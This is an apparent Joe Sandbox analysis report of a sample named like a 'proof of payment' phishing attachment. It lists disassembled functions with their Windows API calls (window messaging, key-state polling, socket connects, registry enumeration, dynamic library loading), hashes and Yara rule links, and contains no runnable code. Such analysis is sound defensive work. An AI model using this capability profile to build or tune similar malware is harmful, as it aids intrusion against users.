Instruction ID: 618d63f0b526583f08a9de127a885e0014d0df92a80560a4cdf7c04f06b5a707
Opcode Fuzzy Hash: 6da12818dbd53f7f284d403d7a8713b3af8e4009961c119a3101a5cf6080a1f9
Instruction Fuzzy Hash: B9218335A0010CAFCB10EFA5CD85EEEB7B8EF88704B044069F609D7251DB75EA01EB61

Function 00FEC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FEC84A
Part of subcall function 00FEC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEC85D
Part of subcall function 00FEC82D: GetCurrentThreadId.KERNEL32 ref: 00FEC864
Part of subcall function 00FEC82D: AttachThreadInput.USER32(00000000), ref: 00FEC86B

GetFocus.USER32 ref: 00FECA05

Part of subcall function 00FEC876: GetParent.USER32(?), ref: 00FEC884

GetClassNameW.USER32(?,?,00000100), ref: 00FECA4E
EnumChildWindows.USER32(?,00FECAC4), ref: 00FECA76
__swprintf.LIBCMT ref: 00FECA90

Strings

%s%d, xrefs: 00FECA8A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: e2cb4a694c51748866dcc3ecad022e9830255f26c4b34f15584d0ecb64a343d6
Instruction ID: 14990d324aec04dc7da9ac1c17a5f6e04bd9b64422f61791fd906b081a0cea83
Opcode Fuzzy Hash: e2cb4a694c51748866dcc3ecad022e9830255f26c4b34f15584d0ecb64a343d6
Instruction Fuzzy Hash: B71184716002097BCF11BFA29C95FE9376DAF44B14F00407AFE18AA146CB7C9646EBB1

Function 01011945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 010119F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 01011A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 01011B49
CloseHandle.KERNEL32(?), ref: 01011BBF

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 9d7e69c6396964515f5f09c6e69000d2f570d37072a6d047fc84a2561e15cb70
Instruction ID: 8fc93905bcdf26a2d8d261d2c6e6e83e764fc3a993b3c0ecf3bb1118ec395e83
Opcode Fuzzy Hash: 9d7e69c6396964515f5f09c6e69000d2f570d37072a6d047fc84a2561e15cb70
Instruction Fuzzy Hash: C1817E70600205ABDF14DF64CD86BADBBE5FF48720F048459FA05AF386DBB9E9419B90

Function 0101E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0101E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 0101E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 0101E248
GetWindowLongW.USER32(?,000000EC), ref: 0101E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0101E281

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 9d5c8735187646d4663f98ea0fed3f929a8d23105f373c0d9d23003c4582c2cc
Instruction ID: 9fd8c2716bdf5d2064c81b544d988086af6ceabeaaf2497d8f5e6cca74d0194f
Opcode Fuzzy Hash: 9d5c8735187646d4663f98ea0fed3f929a8d23105f373c0d9d23003c4582c2cc
Instruction Fuzzy Hash: B0618034A00204AFEB66CF58C895FEE7BFABB89300F144099FDD997295C779A950CB10

Function 00FF1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FF1CB4
VariantClear.OLEAUT32(00000013), ref: 00FF1D26
VariantClear.OLEAUT32(00000000), ref: 00FF1D81
VariantClear.OLEAUT32(?), ref: 00FF1DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FF1E26

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 81c0b0ae76788025e6240e07ffe4e548c10591da44ae898360eb11b308eb678b
Instruction ID: a459e7cf537198f24cf826afaf5b6e5eacb80ef5b20b68c36f7bd9a9382b6e93
Opcode Fuzzy Hash: 81c0b0ae76788025e6240e07ffe4e548c10591da44ae898360eb11b308eb678b
Instruction Fuzzy Hash: 4B5158B5A00209EFDB14CF58C880AAAB7B8FF4C314B158559EE59DB315E734EA51CFA0

Function 01010688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 010106EE
GetProcAddress.KERNEL32(00000000,?), ref: 0101077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0101079B
GetProcAddress.KERNEL32(00000000,?), ref: 010107E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 010107FB

Part of subcall function 00FCE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00FFA574,?,?,00000000,00000008), ref: 00FCE675
Part of subcall function 00FCE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00FFA574,?,?,00000000,00000008), ref: 00FCE699

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: cdb4b45ac353aa70e392a2c397b48943b2c7560b74ba79373c797d44ee681d27
Instruction ID: c38caf92eba6b14c9cb32bda90da814f328570fbbb34263b0b5b383a9605db1a
Opcode Fuzzy Hash: cdb4b45ac353aa70e392a2c397b48943b2c7560b74ba79373c797d44ee681d27
Instruction Fuzzy Hash: E4516975A00205DFCB00EFA8C991DADB7F5BF48310B048099FA95AB356DB38E945DF80

Function 01012E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01013C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01012BB5,?,?), ref: 01013C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01012EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01012F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01012F75
RegCloseKey.ADVAPI32(?,?), ref: 01012FA1
RegCloseKey.ADVAPI32(00000000), ref: 01012FAE

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 49bbceebef3f6e1725417d7051201d040e8811ff59d1445c4fee361fa0666664
Instruction ID: 65ee255b163f7d3a3a6760734aa4bb4f72ca04d90191a7943e26f9efe216d0bc
Opcode Fuzzy Hash: 49bbceebef3f6e1725417d7051201d040e8811ff59d1445c4fee361fa0666664
Instruction Fuzzy Hash: F7514971208204AFD704EB68CC81EAEB7E9BF88714F14886DF59587291DB39E904DB92

Function 010095BF Relevance: 7.6, APIs: 5, Instructions: 142networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 01009691
WSAGetLastError.WSOCK32(00000000), ref: 0100969E
__WSAFDIsSet.WSOCK32(00000000,?), ref: 010096C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 010096E9
WSAGetLastError.WSOCK32(00000000), ref: 010096F8
_strlen.LIBCMT ref: 01009800

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: e1c4eec30e5e30137323ac251a972e3bb6aa82e5810a304b8a8aff4c80b0c470
Instruction ID: 19ccf06169a6976a0701f7a2e2b6a9079acfb044af1226a10c3be9fb97db37c4
Opcode Fuzzy Hash: e1c4eec30e5e30137323ac251a972e3bb6aa82e5810a304b8a8aff4c80b0c470
Instruction Fuzzy Hash: 5C41C031104240AFD725DFA9CD85E6BBBE8BF89714F10461DF2998B2D2E735D900CB92

Function 0101CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a032b04b81d5d901c9067e8f94020a756c22e56dc6d1be2d3ffa0a644aef0eab
Instruction ID: 7ba33c0370d791bdc7c9d2e803ba47ed0a93e27db7d185d1708841742e0b825a
Opcode Fuzzy Hash: a032b04b81d5d901c9067e8f94020a756c22e56dc6d1be2d3ffa0a644aef0eab
Instruction Fuzzy Hash: 1741A139940244ABF760EB6CC948FA9BFA8FB09310F450295E9D9A72D9C638E911CB50

Function 01001206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 010012B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 010012DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0100131C

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 01001341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 01001349

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 11f82a8b765ed3a238d4c825b4e4a02f1d3fae3dd081440c7a9cfba7b1715548
Instruction ID: 0de3286b58fd17582779046a55a7ef5fc2ac5cd624f2cae508c73eab65b1d8d6
Opcode Fuzzy Hash: 11f82a8b765ed3a238d4c825b4e4a02f1d3fae3dd081440c7a9cfba7b1715548
Instruction Fuzzy Hash: 09411C35600105DFDB01EF65C991AAEBBF9FF08310B188099E94AAB3A2CB35ED01DF51

Function 00FCB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 00FCB64F
ScreenToClient.USER32(00000000,000000FF), ref: 00FCB66C
GetAsyncKeyState.USER32(00000001), ref: 00FCB691
GetAsyncKeyState.USER32(00000002), ref: 00FCB69F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: e2befe0f3dbe11bacb5c72e8eccb62116f858830caaf2afc373929063daf4660
Instruction ID: f242b6eb6501ef384b89bcbae02f161b0dd4fdde5f565421175cb1c22a1b0958
Opcode Fuzzy Hash: e2befe0f3dbe11bacb5c72e8eccb62116f858830caaf2afc373929063daf4660
Instruction Fuzzy Hash: 14419E35904116BBDF558FA8C845FE9BBB4BB05324F10435AE86896290C734AD94EFA0

Function 00FEB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00FEB369
PostMessageW.USER32(?,00000201,00000001), ref: 00FEB413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FEB41B
PostMessageW.USER32(?,00000202,00000000), ref: 00FEB429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FEB431

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 6e949c025bff30b4ae0d9a61185c5e8680bba9cd7fde81cb444cb95ab149816a
Instruction ID: acad1a43c3c58332d81b346b1da67a0f3e1049a3b7bcd14b5785bfa1f62fa035
Opcode Fuzzy Hash: 6e949c025bff30b4ae0d9a61185c5e8680bba9cd7fde81cb444cb95ab149816a
Instruction Fuzzy Hash: DB31CE71900259EFDF14CFA9D94DADF3BB5EB04329F104229F961AA1C1C3B4D914EB90

Function 00FEDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00FEDBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FEDBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FEDC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FEDC52
_wcsstr.LIBCMT ref: 00FEDC5C

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 360629ba324534e5941d2ddea4f1f8c369883ed7322d488b806c35fb84bf11d7
Instruction ID: 2e00ad8591b7252030f3fe164ba6d43c5179e95dd5a256591970633a2d5811f2
Opcode Fuzzy Hash: 360629ba324534e5941d2ddea4f1f8c369883ed7322d488b806c35fb84bf11d7
Instruction Fuzzy Hash: B1213732604144BBEB259B7ADD49E7B7BADDF457A0F24402AF809CA181EAA5DC00F360

Function 00FEBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FEBC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FEBCC2
__itow.LIBCMT ref: 00FEBCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FEBD00
__itow.LIBCMT ref: 00FEBD11

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: d2b1d5117f17edffc817550286e29c38d4226bfd421c424a8954eafbeeb5eb6e
Instruction ID: 380d02c1411b48594fa8377478d4f39faeff05d278677bef7416a75c681a17ca
Opcode Fuzzy Hash: d2b1d5117f17edffc817550286e29c38d4226bfd421c424a8954eafbeeb5eb6e
Instruction Fuzzy Hash: 1D21D835B00658BBDB21AEAA8C86FDF7B6DAF49710F100025F945EB181DB78CD05A7A1

Function 00FF6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00FB50E6: _wcsncpy.LIBCMT ref: 00FB50FA

GetFileAttributesW.KERNEL32(?,?,?,?,00FF60C3), ref: 00FF6369
GetLastError.KERNEL32(?,?,?,00FF60C3), ref: 00FF6374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FF60C3), ref: 00FF6388
_wcsrchr.LIBCMT ref: 00FF63AA

Part of subcall function 00FF6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FF60C3), ref: 00FF63E0

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: d7c7a992d83850a33fa961285ab9df71ec27986069c6475159e985061b78a6ad
Instruction ID: 3fb161bd403d147c27584572ce171e3179f7d3a47b5024aecba67798843f6cd5
Opcode Fuzzy Hash: d7c7a992d83850a33fa961285ab9df71ec27986069c6475159e985061b78a6ad
Instruction Fuzzy Hash: 7A213831D0421D4BEB24AA749D02FFA336CAF15370F14046AF245C32D0EF65D984BB50

Function 01008B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0100A82C: inet_addr.WSOCK32(00000000), ref: 0100A84E

socket.WSOCK32(00000002,00000001,00000006), ref: 01008BD3
WSAGetLastError.WSOCK32(00000000), ref: 01008BE2
connect.WSOCK32(00000000,?,00000010), ref: 01008BFE

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 49ed5c03804ccf61df2d70d3eaf37880a3d90eddde2f82a8886ec581007656fd
Instruction ID: 8a15807ad9bf03782aabe4f98e18b93b45be4bfce8588124bc602ba6e4ceb667
Opcode Fuzzy Hash: 49ed5c03804ccf61df2d70d3eaf37880a3d90eddde2f82a8886ec581007656fd
Instruction Fuzzy Hash: 2C216F316002189FDB11AB68CD85F7D77ADBF44720F048459F996972D2DB78A9018B51

Function 01008420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 01008441
GetForegroundWindow.USER32 ref: 01008458
GetDC.USER32(00000000), ref: 01008494
GetPixel.GDI32(00000000,?,00000003), ref: 010084A0
ReleaseDC.USER32(00000000,00000003), ref: 010084DB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5a97736e1432facea65f17b770fee54a088d1539400ab00b5b32c2a6820ef026
Instruction ID: 6e23705a93f2676603bfc6b61e307bb34d8c81b9c299fff8b7793823d5b2e3e5
Opcode Fuzzy Hash: 5a97736e1432facea65f17b770fee54a088d1539400ab00b5b32c2a6820ef026
Instruction Fuzzy Hash: A221A135A00204AFD710DFA4CD85AAEBBE9EF48301F048479E99997251DB79AC00DB60

Function 00FCAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00FCAFE3
SelectObject.GDI32(?,00000000), ref: 00FCAFF2
BeginPath.GDI32(?), ref: 00FCB009
SelectObject.GDI32(?,00000000), ref: 00FCB033

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
